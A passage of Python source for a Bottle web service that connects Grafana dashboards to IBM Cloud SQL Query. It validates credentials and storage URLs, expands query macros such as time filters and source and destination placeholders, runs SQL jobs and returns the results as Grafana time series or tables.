headers={"Content-type": "application/json"},
)
apiKey = body.get("apiKey").strip()
# result_location = body.get('result_location').strip()
source_type = SourceType.UNUSED
if "using_table" not in body:
# TODO if this occur - go back and check why default value is not set in Grafana plugin
body["using_table"] = False
if body["using_table"] is False:
if "source_cos_url" in body and len(body["source_cos_url"]) > 0:
source_cos_url = body.get("source_cos_url").strip()
format_type = body.get("format_type").strip()
if source_cos_url is None or not ParsedUrl().is_valid_cos_url(
source_cos_url
):
msg = "Invalid COS URL for source"
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
else:
source_type = SourceType.COSURL
else:
if "table" in body and len(body["table"]) > 0:
table = body.get("table").strip()
source_type = SourceType.TABLE
if "target_cos_url" not in body or len(body["target_cos_url"]) == 0:
msg = "Need target COS URL"
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
target_cos_url = body.get("target_cos_url").strip()
msg = "Need rate limit as an int > 0"
e = HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
if "instance_rate_limit" not in body or len(body["instance_rate_limit"]) == 0:
raise e
elif not RepresentsInt(body["instance_rate_limit"]):
raise e
instance_rate_limit = body.get("instance_rate_limit").strip()
# assert(ref_cloud_apikey == apiKey)
# assert(ref_instance_crn == instance_crn)
if target_cos_url is None or not ParsedUrl().is_valid_cos_url(target_cos_url):
msg = "Invalid COS URL for target"
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
# print(apiKey)
# print(instance_crn)
# print(result_location)
# print(target_cos_url)
# print(instance_rate_limit)
# logger.info(apiKey)
if key not in grafanaPluginInstancesSqlClient.keys():
# TODO: consider add max_concurrent_jobs info from `instance_rate_limit`
sqlClient = SQLClient(
api_key=apiKey,
instance_crn=instance_crn,
target_cos_url=target_cos_url,
iam_max_tries=IAM_MAX_TRIES,
max_tries=MAX_TRIES,
max_concurrent_jobs=instance_rate_limit,
)
grafanaPluginInstancesSqlClient[key] = sqlClient
if DEBUG:
print("Create new SQLClient: ", sqlClient)
# grafanaPluginInstances.save_sqlclients()
else:
sqlClient = grafanaPluginInstancesSqlClient[key]
try:
sqlClient.logon()
if sqlClient.logged_on is True:
if DEBUG:
print("Found SQLClient: ", sqlClient)
except AttributeError:
# recreate
sqlClient = SQLClient(
api_key=apiKey,
instance_crn=instance_crn,
target_cos_url=target_cos_url,
iam_max_tries=IAM_MAX_TRIES,
max_tries=MAX_TRIES,
max_concurrent_jobs=instance_rate_limit,
)
grafanaPluginInstancesSqlClient[key] = sqlClient
if DEBUG:
print("Create new SQLClient: ", sqlClient)
response.headers["Content-Type"] = "application/json"
try:
if data_exist and (
stored_apiKey != apiKey
or instance_crn != stored_instance_crn
or stored_target_cos_url != target_cos_url
or instance_rate_limit != stored_instance_rate_limit
):
if DEBUG:
print("HTTP input: ", instance_crn, " \n", apiKey)
sqlClient.configure(
api_key=apiKey,
instance_crn=instance_crn,
target_cos_url=target_cos_url,
)
# test API key
sqlClient.logon()
print("SQL URL: ", sqlClient.sql_ui_link())
# test SQL Query CRN
# test COS OUT URL
sql_stmt = """
SELECT 1
INTO {target_cos_url} STORED AS CSV
""".format(
target_cos_url=target_cos_url
)
sqlClient.run_sql(sql_stmt)
# # test COS IN URL
if source_type == SourceType.COSURL:
df = sqlClient.get_schema_data(source_cos_url, type=format_type)
if len(df) == 1 and df["name"][0] == "_corrupt_record":
msg = "Check format for source COS URL"
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
elif source_type == SourceType.TABLE:
df = sqlClient.describe_table(table)
if df is None:
msg = "Check if table name is correct"
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
# data_schema[source_cos_url] = sqlClient.get_schema_data(source_cos_url, type=format_type)
print("Login ok")
# response.status = 200
response.status = "200 API Key valid"
# return json.dumps({ 'status': 'success', 'message': 'Success',"data": {} }), 200
theBody = "Login ok."
response.body = theBody
# safe to update
grafanaPluginInstances[key] = body
grafanaPluginInstances.save()
return response
except (ibm_botocore.exceptions.CredentialRetrievalError, AttributeError):
# return BaseResponse(body='Invalid API key', status=401)
msg = "Invalid API key"
if DEBUG:
print(msg)
# response.body = json.dumps({'error':msg})
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
except CosUrlNotFoundException as e:
msg = "Wrong COS URL (either source or target) authentication"
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
except SqlQueryCrnInvalidFormatException as e:
msg = "Wrong Sql Query CRN"
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
except HTTPResponse as e:
raise e
except Exception as error:
msg = "Unknown error: {}".format(str(type(error)))
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
@app.hook("after_request")
def enable_cors():
"""
Grafana makes AJAX call to the data source in either proxy-mode or direct-mode.
In proxy-mode, Grafana uses its own backend server, and add CORS header to the request.
In direct mode, Grafana sends directly to the rest API app, so the request should contains the CORS request
so that the browser allows Grafana to get the result.
"""
print("after_request hook: enable_cors")
for key in response.headers.keys():
print(response.headers.getall(key))
print("----------")
response.headers["Access-Control-Allow-Origin"] = "*"
response.headers["Access-Control-Allow-Methods"] = "OPTIONS"
response.headers["Access-Control-Allow-Headers"] = "Accept, Content-Type"
@app.hook("after_request")
def add_hostname_info():
"""when deploying the webapp via Docker container,
it is good to know the location for debug purpose
return the three-letter location name and the container number from the end of the hostname string.
"""
print("after_request hook: add hostname-info")
for key in response.headers.keys():
print(key, ": ", response.headers.getall(key))
print("----------")
env_host = str(os.environ.get("HOSTNAME"))
hostname = re.findall("[a-z]{3}-\d$", env_host)
if hostname:
response.headers["SP-LOCATION"] = hostname
return response
pass
@app.post("/search")
def search():
"""Return a HTTPResponse containing a JSON array
with the names of the data series available
* headers that specify that this is response is JSON.
Returns
-------
HTTPResponse
list of name of the data series
"""
print(request)
return HTTPResponse(
body=json_dumps(["series A", "series B"]),
headers={"Content-Type": "application/json"},
)
@app.post("/query")
def query():
"""Handle the query from Grafana
This endpoint can return either
* time-series data
* a table for each series
Grafana sends a request which specifies that it queries for the tabular data.
The request is a JSON as
.. console-block: python
'targets': [{'target': 'series B', 'refId': 'A', 'type': 'table'}]
Grafana expects the time-series data in the format
* datapoints are a list of value and unixtimestamp in milliseconds.
.. console-block: python
[
{
"target":"series A", // The field being queried for
"datapoints":[
[622,1450754160000], // Metric value as a float , unixtimestamp in milliseconds
[365,1450754220000]
]
},
{
"target":"series B",
"datapoints":[
[861,1450754160000],
[767,1450754220000]
]
}
]
Returns
-------
[type]
[description]
"""
# if key in grafanaPluginInstances.keys():
# body = grafanaPluginInstances[key]
# else:
# grafanaPluginInstances[key] = body
logger.debug("========= PRINT REQUEST ============")
logger.debug(request)
logger.debug("========= END PRINT REQUEST ============")
body = request.body.read().decode("utf-8")
body = json.loads(body)
import pprint
logger.debug("========= PRINT body of REQUEST ============")
pprint.pprint(body, width=1)
logger.debug("========= END PRINT body of REQUEST ============")
# check to see if it's safe to launch
query = body["targets"][0]
# id = query["id"]
id_name = "dummy_string"
name = query["name"]
key = gen_key(id_name, name)
key_refId = gen_key_refId(body["dashboardId"], body["panelId"], query["refId"])
sql_stmt = query["queryText"]
sleep_time = max(2.0, min(15.0, 2 * len(body["targets"])))
if not grafanaPluginInstances.should_sql_stmt_be_run(
key, key_refId, sql_stmt, sleep_time
):
# don't launch any
body = json_dumps([])
return HTTPResponse(body=body, headers={"Content-Type": "application/json"})
# launch now
# loop through all queries and process it
resp_body = []
sqlClient = None
key = None
for query in body["targets"]:
if "hide" in query and query["hide"] is True:
continue
res, error_obj = process_query(query, body, sqlClient=sqlClient, old_key=key)
if error_obj is not None:
raise error_obj
if isinstance(res, list):
for r in res:
resp_body.append(r)
if res is None:
# get_result <- False
pass
else:
resp_body.append(res)
body = json_dumps(resp_body)
return HTTPResponse(body=body, headers={"Content-Type": "application/json"})
def process_query(fullquery, body, sqlClient=None, old_key=None):
"""
Parameters
------------
fullquery: dict
The dict object with all information required to launch a query
body: dict
The body of the original full HTTP request
sqlClient: SQLClient
The object that can launch the sql stmt string
old_key: str
The key which tracks the given sqlClient object
Returns
--------
returns a tuple (result, error_object)
None, error_object --> error is detected
result, None --> result
None, None --> when result is not needed [intermediate result]
NOTE: A result can be a dict{} : represent a single time-series data or single table data
or a list of dict: represent multiple time-series data
"""
# i = i-th query
# fullquery = body["targets"][i]
result = None
data_type = "TableData"
if "format" in fullquery and fullquery["format"] == "time_series":
data_type = "TimeSeries"
if "queryText" not in fullquery:
# don't run further
# TODO - return empty things
return {}, None
sql_stmt = fullquery["queryText"]
if len(sql_stmt.strip()) == 0:
return None, None
logger.debug("========= PRINT sql_stmt ============")
logger.debug(sql_stmt)
logger.debug("========= END PRINT sql_stmt ============")
# id = fullquery["id"]
id_name = "dummy_string"
name = fullquery["name"]
key = gen_key(id_name, name)
# TODO : calculate these and check if SQL query uses
# 'DAY' 'MONTH' 'YEAR' to replace it with:
# DAY between day_from and day_to
# MONTH between month_from and month_to
# YEAR between year_from and year_to
#
from dateutil import parser
dt_from = parser.parse(body["range"]["from"])
dt_to = parser.parse(body["range"]["to"])
sdt_from = body["range"]["from"]
sdt_to = body["range"]["to"]
if len(get_columns_from_single_select(sql_stmt)) == 0 and re.search(
r"(?i)^\s*select", sql_stmt
):
msg = "The 'SELECT *' is being used: Not accepted in the query with Id {}".format(
fullquery["refId"]
)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
columns = parse_sql_columns(sql_stmt)
columns_from_to = find_column_mapping(sql_stmt, columns)
if len(columns) > 0:
# find the column containing time - for time replacement
# when $__timeFilter() is used
time_col = columns[0]
if "time_column" in fullquery:
tmp = fullquery["time_column"].strip()
if len(tmp) > 0:
time_col = tmp
if time_col not in columns:
msg = "The name for time-column {} doesn't match with the column(s) in the query with Id {}".format(
time_col, fullquery["refId"]
)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
sql_stmt = process_macro_timeFilterColumn(
p_timeFilterColumn, sql_stmt, sdt_from, sdt_to
)
patterns = p_timeFilter.findall(sql_stmt)
for pattern in patterns:
pattern = p_timeFilter.search(sql_stmt)
if pattern:
# the $__timeFilter is used
appname = pattern.group(1).strip().lower()
substr = ""
# process for regular data
type_of_column = appname
if "string" == type_of_column:
# the type is string
# if {time_col} is in timestamp
substr += """ to_timestamp({time_col}) BETWEEN to_timestamp("{dt_from}") and to_timestamp("{dt_to}")""".format(
time_col=time_col, dt_from=sdt_from, dt_to=sdt_to
)
else:
# flake8: noqa = E501
substr += """ cast({time_col}/1000 as long) BETWEEN to_unix_timestamp(to_timestamp("{dt_from}")) and to_unix_timestamp(to_timestamp("{dt_to}"))""".format(
time_col=time_col, dt_from=sdt_from, dt_to=sdt_to
) # noqa = E501
sql_stmt = p_timeFilter.sub(substr, sql_stmt, count=1)
sql_stmt = process_macro_data_source(
p_cos_in, grafanaPluginInstances.get_cos_source, key, sql_stmt
)
sql_stmt = process_macro_data_source(
p_cos_in_using, grafanaPluginInstances.get_cos_source_using, key, sql_stmt
)
p_reg = p_cos_in_test
patterns = p_reg.findall(sql_stmt)
for pattern in patterns:
pattern = p_reg.search(sql_stmt)
if pattern.group(1) is None:
# $__source_test
ts_form = ""
else:
# $__source_test()
ts_form = re.sub(r"\(|\)", "", pattern.group(1).strip().lower())
substr = ""
if ts_form in ["ts", ""]: # single time-series"
substr = grafanaPluginInstances.get_sts_random_data(key, dt_from, dt_to)
if "mts" == ts_form: # multipletime-series"
substr = grafanaPluginInstances.get_mts_random_data(key, dt_from, dt_to)
if pattern:
# the $__source_test is used
sql_stmt = p_reg.sub(substr, sql_stmt, count=1)
# get source COS URL as the output of a previous query
p_reg = p_cos_in_prev
patterns = p_reg.findall(sql_stmt)
for pattern in patterns:
pattern = p_reg.search(sql_stmt)
if pattern.group(1) is None:
# $__source_prev
msg = "Need to specify refId name in $__source_prev, e.g. $__source_prev(A)"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
else:
# $__source_prev()
prev_refId_name = re.sub(r"\(|\)", "", pattern.group(1).strip())
substr = ""
if len(prev_refId_name) == 0:
msg = "Need to specify refId name in $__source_prev, e.g. $__source_prev(A)"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
# TODO
# May extend here to allow reading data from another panel and/or dashboard
key_refId = gen_key_refId(body["dashboardId"], body["panelId"], prev_refId_name)
try:
substr = grafanaPluginInstances.get_cos_source_prev(key, key_refId)
except KeyError:
msg = (
"The name {} used in $__source_prev()"
"does not exist or is not the prior sql statement in the chain"
).format(prev_refId_name)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
if pattern:
# the $__source_test is used
sql_stmt = p_reg.sub(substr, sql_stmt, count=1)
# get target COS URL
p_reg = p_cos_out
patterns = p_reg.findall(sql_stmt)
for _ in patterns:
pattern = p_reg.search(sql_stmt)
substr = ""
if pattern.group(1) is None:
# $__dest
substr = ""
else:
# $__dest()
# $__dest(<format> [,suffix])
# Example:
# $__dest(parquet)
# $__dest(parquet, a/b/c)
args_str = re.sub(r"\(|\)", "", pattern.group(1).strip())
if len(args_str) > 0:
arg_list = args_str.split(",")
if len(arg_list) > 2:
msg = "$__dest() can't have more than two arguments"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
if len(arg_list) == 1:
# must be format type
format_type = arg_list[0].upper()
suffix = ""
else:
format_type = arg_list[0].upper()
suffix = arg_list[1].strip()
if format_type not in ["PARQUET", "AVRO", "CSV", "JSON", "ORC"]:
pass
msg = "Invalid format of data used in $__dest macro"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
substr = grafanaPluginInstances.get_cos_dest(key, suffix, format_type)
if pattern:
# the $__source_test is used
sql_stmt = p_reg.sub(substr, sql_stmt, count=1)
try:
while True:
try:
sql_stmt = format_sql(sql_stmt)
sql_stmt = sql_stmt.replace("\\'", '"')
logger.info("Query to be issued:\n", sql_stmt)
# TODO: convert this to a function with
# and decorate the function with @functools.lru_cache
# https://docs.python.org/3.4/library/functools.html#functools.lru_cache
df = None
key_refId = gen_key_refId(
body["dashboardId"], body["panelId"], fullquery["refId"]
)
# for some reason Grafana sends twice, and this to prevent from running twice on Cloud SQL
# there is a chance that a new query will be sent shortly which override the current
# one - as we can't cancel a launched SQL Query --> so we put in the queue and
# wait a little before before really launch it
# if not grafanaPluginInstances.should_sql_stmt_be_run(key, key_refId, sql_stmt):
# break
# TODO - consider allow users to request 'rerun
rerun = False
if sqlClient:
assert old_key == key
if "get_result" in fullquery and fullquery["get_result"] is False:
job_id = query_data_noresultback(
key, sql_stmt, rerun=rerun, sqlClient=sqlClient
)
else:
df, job_id = query_data(
key, key_refId, sql_stmt, rerun=rerun, sqlClient=sqlClient
)
if df is None:
msg = "Query {}: no data returned or query failed due to timeout".format(
fullquery["refId"]
)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
# a unique reference needs dashboardId + panelid + refid
# TODO : When the webapp is shared by multiple instances of Grafana
# --> maybe the dashboardId and panelId can be the same for those from
# two Grafana instance --> need to resolve this
grafanaPluginInstances.save_job_id(key, key_refId, job_id)
break
except RateLimitedException:
sleep(10)
except TooManyRowsException as e:
msg = "The query returns too many rows - please revise it"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
except NoResultException as e:
msg = "The query returns nothing - please revise it"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
if "get_result" in fullquery and fullquery["get_result"] is False:
return None, None
except CosUrlInaccessibleException as e:
msg = "Query {}: Check if you use the right data-source: {}".format(
fullquery["refId"], str(e)
)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
except Exception as e:
msg = "Query {}: unknown error {}".format(fullquery["refId"], str(e))
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
logger.info("RESULT is available")
if df is None:
# no data returned
msg = "Query {}: No data returned: check the time rang".format(
fullquery["refId"]
)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
# make NaN to empty string to so that client can understand
df.replace(np.nan, "", regex=True, inplace=True)
if data_type == "TimeSeries":
# In TypeScript:
# export type TimeSeriesValue = string | number | null;
# export type TimeSeriesPoints = TimeSeriesValue[][];
# export interface TimeSeries {
# target: string;
# datapoints: TimeSeriesPoints;
# unit?: string;
# }
# [TimeSeries] body must be a list, an element is a dict with 2 fields
# . 'target' = name of a series
# . 'datapoint' = the 2D data [row][col]
# . 'unit' = (optional)
# {'target': name, 'datapoints': datapoints})
# DataFrame
"""
https://github.com/grafana/grafana/blob/master/packages/grafana-data/src/dataframe/processDataFrame.ts
{
name: timeSeries.target || (timeSeries as any).name,
refId: timeSeries.refId,
meta: timeSeries.meta,
fields,
length: values.length, // # rows in DataFrame
};
which means we return a dict
{
'name': name,
'refId': refId,
'meta': any metadata,
'length': numeric, // # rows in DataFrame
'fields': [
{
'name': col-name, // e.g. 'Time'
'type': 'fieldtype', //see above
'config': {}, //optional
'values': [list-of-values]
},
{
'name': col-name, //e.g. 'Value'
'type': 'fieldtype', //see above
config: {
unit: "a unit-here",
},
'values': [list-of-values]
'labels': 'original a 'tag' attribute in timeSeries'
}
]
}
"""
time_col = df.columns[0]
if "time_column" in fullquery:
tmp = fullquery["time_column"].strip()
if len(tmp) > 0:
time_col = tmp
if time_col in columns_from_to:
time_col = columns_from_to[time_col]
df = revise_time_column(time_col, df)
logger.debug("========= PRINT result of sql_stmt ============")
logger.debug(type(df))
logger.debug(".. .first 5 rows")
logger.debug(df.head(5))
logger.debug("========= END PRINT result of sql_stmt ============")
name = "series" + fullquery["refId"]
col_names = list(df.columns)
index = col_names.index(time_col)
# IMPORTANT: 2nd column must be timestamp
if index != 1:
tmp = col_names[1]
col_names[1] = time_col
col_names[index] = tmp
if len(col_names) > 2:
# process MTS (multi-time-series)
metrics_col = df.columns[2]
if "metrics_column" in fullquery:
tmp = fullquery["metrics_column"].strip()
if len(tmp) > 0:
metrics_col = tmp
index = col_names.index(metrics_col)
if index == 0:
tmp = col_names[2]
col_names[2] = metrics_col
col_names[index] = tmp
col_names = col_names[0:2]
# try returning multiple time-series
metrics = df[metrics_col].unique()
result = []
for met in metrics:
name = met
df_tmp = df[df[metrics_col].eq(met)]
datapoints = df_tmp[col_names].values.tolist()
result.append({"target": str(name), "datapoints": datapoints})
else:
# process STS (single TS)
datapoints = df[col_names].values.tolist()
# remember that an HTTP request can contain multiple queries, i.e. targets is a list
# that's why the body result should be a list
result = {"target": str(name), "datapoints": datapoints}
elif data_type == "TableData":
# [TableData] body must be a list, an element is a dict with 3 fields
# . 'type': 'table' or 'timeseries'
# . 'columns': a list of len = number of columns, each element is a dict of 2 entries:
# 'text' : field-name, 'type': a string representatin of 'time',
# 'string', 'number' [a value provided by FieldType in Grafana]
# . 'rows' : a list, of len = number of rows, and each entry is a list of values in one row
# 'series A': [{
# "columns":[
# {"text":"Time","type":"time"},
# {"text":"Country","type":"string"},
# {"text":"Number","type":"number"}
# ],
# "rows":[
# [1234567,"SE",123],
# [1234567,"DE",231],
# [1234567,"US",321]
# ],
# "type":"table"
# }],
# body = json_dumps(tabular_data[series])
time_col = ""
if "time_column" in fullquery:
tmp = fullquery["time_column"].strip()
if len(tmp) > 0:
time_col = tmp
if time_col in columns_from_to:
time_col = columns_from_to[time_col]
df = revise_time_column(time_col, df)
mdict = {}
mdict["columns"] = []
y = build_table_schema(df)
for col in y["fields"]:
if col["name"] == "index":
continue
x = {}
x["text"] = col["name"]
stype = ""
if col["type"] in ["integer", "number"]:
stype = "number"
elif col["type"] in ["datetime"] or col["name"] == time_col:
stype = "time"
elif col["type"] in ["string"]:
stype = "string"
elif col["type"] in ["boolean"]:
stype = "boolean"
else:
print("col: ", col["type"])
logger.info("col: ", col["type"])
assert 0
x["type"] = stype
mdict["columns"].append(x)
mdict["rows"] = df.values.tolist()
result = mdict
if DEBUG:
logger.debug("=====")
logger.debug(".. print first 5 rows")
# don't print too long result
import pprint
pprint.pprint(result["columns"], width=1)
pprint.pprint(len(result["rows"]))
# pprint.pprint(result['rows'][1:5], width=1, depth=1)
return result, None
@app.post("/variable")
def variable():
"""Handle the query from Grafana that read the content for a variable which can be
* list of values
* list of label/value pair
Returns
-------
[type]
[description]
"""
# if key in grafanaPluginInstances.keys():
# body = grafanaPluginInstances[key]
# else:
# grafanaPluginInstances[key] = body
print("========= Variable content ============")
print(request)
body = request.body.read().decode("utf-8")
body = json.loads(body)
import pprint
print("========= PRINT body of REQUEST ============")
pprint.pprint(body, width=1)
print("========= END PRINT body of REQUEST ============")
query = body["options"]["variable"]
key = None
# check to see if it's safe to launch
# query = body["targets"][0]
id_name = "dummy_string"
name = query["datasource"]
key = gen_key(id_name, name)
sqlClient = grafanaPluginInstances.get_sqlclient(key, thread_safe=True)
if 0:
key_refId = gen_key_refId("dummy", "dummy", query["id"])
sql_stmt = query["query"]
sleep_time = 2 # seconds
if not grafanaPluginInstances.should_sql_stmt_be_run(
key, key_refId, sql_stmt, sleep_time
):
# don't launch any
body = json_dumps([])
return HTTPResponse(body=body, headers={"Content-Type": "application/json"})
# launch now
# loop through all queries and process it
resp_body = []
# NOTE: There can be multiple query variables defined; but they are sent individually to here
# if "hide" in query and query["hide"] is True:
# continue
# res, error_obj = process_query(query, body, sqlClient=sqlClient, old_key=key)
sql_stmt = query["query"]
data_type = "TableData"
res, error_obj = process_query_variable(query, key, sqlClient)
if error_obj is not None:
raise error_obj
if isinstance(res, list):
for r in res:
resp_body.append(r)
if res is None:
# get_result <- False
assert 0
else:
resp_body.append(res)
# must be an array
body = json_dumps(resp_body)
return HTTPResponse(body=body, headers={"Content-Type": "application/json"})
def process_query_variable(
fullquery,
key,
sqlClient=None,
dt_from=None,
dt_to=None,
sdt_from=None,
sdt_to=None,
):
sql_stmt = fullquery["query"]
data_type = "TableData"
if len(sql_stmt.strip()) == 0:
return None, None
logger.debug("========= PRINT sql_stmt ============")
logger.debug(sql_stmt)
logger.debug("========= END PRINT sql_stmt ============")
# logger.debug('------------------')
# logger.debug(grafanaPluginInstances)
# # store the object connecting to SQL Client service
# logger.debug(grafanaPluginInstancesSqlClient)
# logger.debug('------------------')
# id = fullquery["id"]
# TODO : calculate these and check if SQL query uses
# 'DAY' 'MONTH' 'YEAR' to replace it with:
# DAY between day_from and day_to
# MONTH between month_from and month_to
# YEAR between year_from and year_to
#
if len(get_columns_from_single_select(sql_stmt)) == 0 and re.search(
r"(?i)^\s*select", sql_stmt
):
msg = "The 'SELECT *' is being used: Not accepted in the query with Id {}".format(
fullquery["id"]
)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
columns = parse_sql_columns(sql_stmt)
columns_from_to = find_column_mapping(sql_stmt, columns)
if len(columns) > 0:
# find the column containing time - for time replacement
# when $__timeFilter() is used
time_col = columns[0]
if "time_column" in fullquery:
tmp = fullquery["time_column"].strip()
if len(tmp) > 0:
time_col = tmp
if time_col not in columns:
msg = "The name for time-column {} doesn't match with the column(s) in the query with Id {}".format(
time_col, fullquery["refId"]
)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
sql_stmt = process_macro_timeFilterColumn(
p_timeFilterColumn, sql_stmt, sdt_from, sdt_to
)
patterns = p_timeFilter.findall(sql_stmt)
for pattern in patterns:
pattern = p_timeFilter.search(sql_stmt)
if pattern:
# the $__timeFilter is used
appname = pattern.group(1).strip().lower()
substr = ""
if "aiops" == appname:
# process for AIOps data
substr += get_datetime_conditions_aiops(dt_from, dt_to) + " AND "
# process for regular data
type_of_column = appname
if "string" == type_of_column:
# the type is string
# if {time_col} is in timestamp
substr += """ to_timestamp({time_col}) BETWEEN to_timestamp("{dt_from}") and to_timestamp("{dt_to}")""".format(
time_col=time_col, dt_from=sdt_from, dt_to=sdt_to
)
else:
# flake8: noqa = E501
# substr += """ {time_col} >= to_date("{dt_from}") and {time_col} <= to_date("{dt_to}")""".format(time_col=time_col, dt_from=sdt_from, dt_to=sdt_to)
# substr += """ {time_col} BETWEEN "{dt_from}" and "{dt_to}" """.format(time_col=time_col, dt_from=sdt_from, dt_to=sdt_to)
substr += """ cast({time_col}/1000 as long) BETWEEN to_unix_timestamp(to_timestamp("{dt_from}")) and to_unix_timestamp(to_timestamp("{dt_to}"))""".format(
time_col=time_col, dt_from=sdt_from, dt_to=sdt_to
) # noqa = E501
sql_stmt = p_timeFilter.sub(substr, sql_stmt, count=1)
sql_stmt = process_macro_data_source(
p_cos_in, grafanaPluginInstances.get_cos_source, key, sql_stmt
)
sql_stmt = process_macro_data_source(
p_cos_in_using, grafanaPluginInstances.get_cos_source_using, key, sql_stmt
)
# p_reg = p_cos_in
# patterns = p_reg.findall(sql_stmt)
# try:
# substr = grafanaPluginInstances.get_cos_source(key)
# except KeyError:
# # TODO: maybe we want to resend the credential each time - as when deploying to CodeEngine - the storage is not permanent?
# msg = "The webapp doesn't hold CloudSQL info - you may want to revalidate in the datasource setting"
# return None, HTTPResponse(
# body=json.dumps({'error': msg}),
# status=403,
# headers={'Content-type': 'application/json'}
# )
# if len(patterns) > 0 and len(substr) == 0:
# msg = "Can't use $__source (default value has not been configured yet)"
# raise HTTPResponse(
# body=json.dumps({'error': msg}),
# status=403,
# headers={'Content-type': 'application/json'}
# )
# for pattern in patterns:
# pattern = p_reg.search(sql_stmt)
# if pattern:
# # the $__source is used
# sql_stmt = p_reg.sub(substr, sql_stmt, count=1)
# get test_data
p_reg = p_cos_in_test
patterns = p_reg.findall(sql_stmt)
for pattern in patterns:
pattern = p_reg.search(sql_stmt)
if pattern.group(1) is None:
# $__source_test
ts_form = ""
else:
# $__source_test()
ts_form = re.sub(r"\(|\)", "", pattern.group(1).strip().lower())
substr = ""
if ts_form in ["ts", ""]: # single time-series"
substr = grafanaPluginInstances.get_sts_random_data(key, dt_from, dt_to)
if "mts" == ts_form: # multipletime-series"
substr = grafanaPluginInstances.get_mts_random_data(key, dt_from, dt_to)
if pattern:
# the $__source_test is used
sql_stmt = p_reg.sub(substr, sql_stmt, count=1)
# get source COS URL as the output of a previous query
p_reg = p_cos_in_prev
patterns = p_reg.findall(sql_stmt)
for pattern in patterns:
pattern = p_reg.search(sql_stmt)
if pattern.group(1) is None:
# $__source_prev
msg = "Need to specify refId name in $__source_prev, e.g. $__source_prev(A)"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
else:
# $__source_prev()
prev_refId_name = re.sub(r"\(|\)", "", pattern.group(1).strip())
substr = ""
if len(prev_refId_name) == 0:
msg = "Need to specify refId name in $__source_prev, e.g. $__source_prev(A)"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
# TODO
# May extend here to allow reading data from another panel and/or dashboard
# key_refId = gen_key_refId(body["dashboardId"], body["panelId"], prev_refId_name)
key_refId = gen_key_refId("dummy", "dummy", prev_refId_name)
try:
substr = grafanaPluginInstances.get_cos_source_prev(key, key_refId)
except KeyError:
msg = (
"The name {} used in $__source_prev()"
"does not exist or is not the prior sql statement in the chain"
).format(prev_refId_name)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
if pattern:
# the $__source_test is used
sql_stmt = p_reg.sub(substr, sql_stmt, count=1)
# get target COS URL
p_reg = p_cos_out
patterns = p_reg.findall(sql_stmt)
for _ in patterns:
pattern = p_reg.search(sql_stmt)
substr = ""
if pattern.group(1) is None:
# $__dest
substr = ""
else:
# $__dest()
# $__dest(<format> [,suffix])
# Example:
# $__dest(parquet)
# $__dest(parquet, a/b/c)
args_str = re.sub(r"\(|\)", "", pattern.group(1).strip())
if len(args_str) > 0:
arg_list = args_str.split(",")
if len(arg_list) > 2:
msg = "$__dest() can't have more than two arguments"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
if len(arg_list) == 1:
# must be format type
format_type = arg_list[0].upper()
suffix = ""
else:
format_type = arg_list[0].upper()
suffix = arg_list[1].strip()
if format_type not in ["PARQUET", "AVRO", "CSV", "JSON", "ORC"]:
pass
msg = "Invalid format of data used in $__dest macro"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
substr = grafanaPluginInstances.get_cos_dest(key, suffix, format_type)
if pattern:
# the $__source_test is used
sql_stmt = p_reg.sub(substr, sql_stmt, count=1)
# print(sql_stmt)
try:
while True:
try:
sql_stmt = format_sql(sql_stmt)
sql_stmt = sql_stmt.replace("\\'", '"')
print("Query to be issued:\n", sql_stmt)
# TODO: convert this to a function with
# and decorate the function with @functools.lru_cache
# https://docs.python.org/3.4/library/functools.html#functools.lru_cache
df = None
